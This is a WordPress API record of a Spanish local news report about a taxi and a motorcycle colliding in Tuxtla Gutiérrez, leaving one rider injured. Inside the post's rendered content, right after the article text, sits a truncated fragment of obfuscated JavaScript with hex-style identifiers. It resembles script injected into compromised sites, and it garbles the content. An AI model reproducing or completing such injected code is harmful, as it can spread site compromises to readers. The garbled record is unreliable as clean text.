{"id":8164,"date":"2023-01-19T03:42:31","date_gmt":"2023-01-19T03:42:31","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8164"},"modified":"2023-01-19T03:42:32","modified_gmt":"2023-01-19T03:42:32","slug":"taxista-y-motociclista-colisionan-en-la-avenida-central","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8164","title":{"rendered":"Taxista y motociclista colisionan en la Avenida Central"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"960\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/FB_IMG_1674099688426.jpg\" alt=\"\" class=\"wp-image-8165\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/FB_IMG_1674099688426.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/FB_IMG_1674099688426-225x300.jpg 225w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 18 de enero del 2023. Tuxtla Guti\u00e9rrez.- Este mi\u00e9rcoles por la tarde una colisi\u00f3n entre un taxista y un motociclista en la Avenida Central dej\u00f3 un lesionado y da\u00f1os materiales.Este hecho ocurri\u00f3 minutos antes de las tres de la tarde cuando el conductor de la motocicleta Italika tipo 150 cc de color negro con azul se desplazada de Oriente a Poniente con la luz verde a la altura de la 16 Oriente cuando el taxi con n\u00famero econ\u00f3mico 1086 versa le tap\u00f3 el paso.Por el fuerte impacto sali\u00f3 volando y se estrell\u00f3 contra el pavimento.Transe\u00fantes lo ayudaron a moverse al Camell\u00f3n Central para evitar otro percance.Al lugar arribaron param\u00e9dicos de la Cruz Roja para atender al herido pero no fue trasladado a un nosocomio.En el lugar el responsable se hizo responsable de los da\u00f1os mediante un seguro y llagaron a un acuerdo armonioso.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 18 de enero del 2023. Tuxtla Guti\u00e9rrez.- Este mi\u00e9rcoles por la tarde una colisi\u00f3n entre un taxista y un motociclista en la Avenida Central dej\u00f3 un lesionado y da\u00f1os materiales.Este hecho ocurri\u00f3 minutos antes de las tres de la tarde cuando el conductor de la motocicleta Italika tipo 150 cc de color &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8165,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-8164","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8164","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8164"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8164\/revisions"}],"predecessor-version":[{"id":8166,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8164\/revisions\/8166"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8165"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8164"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8164"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8164"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}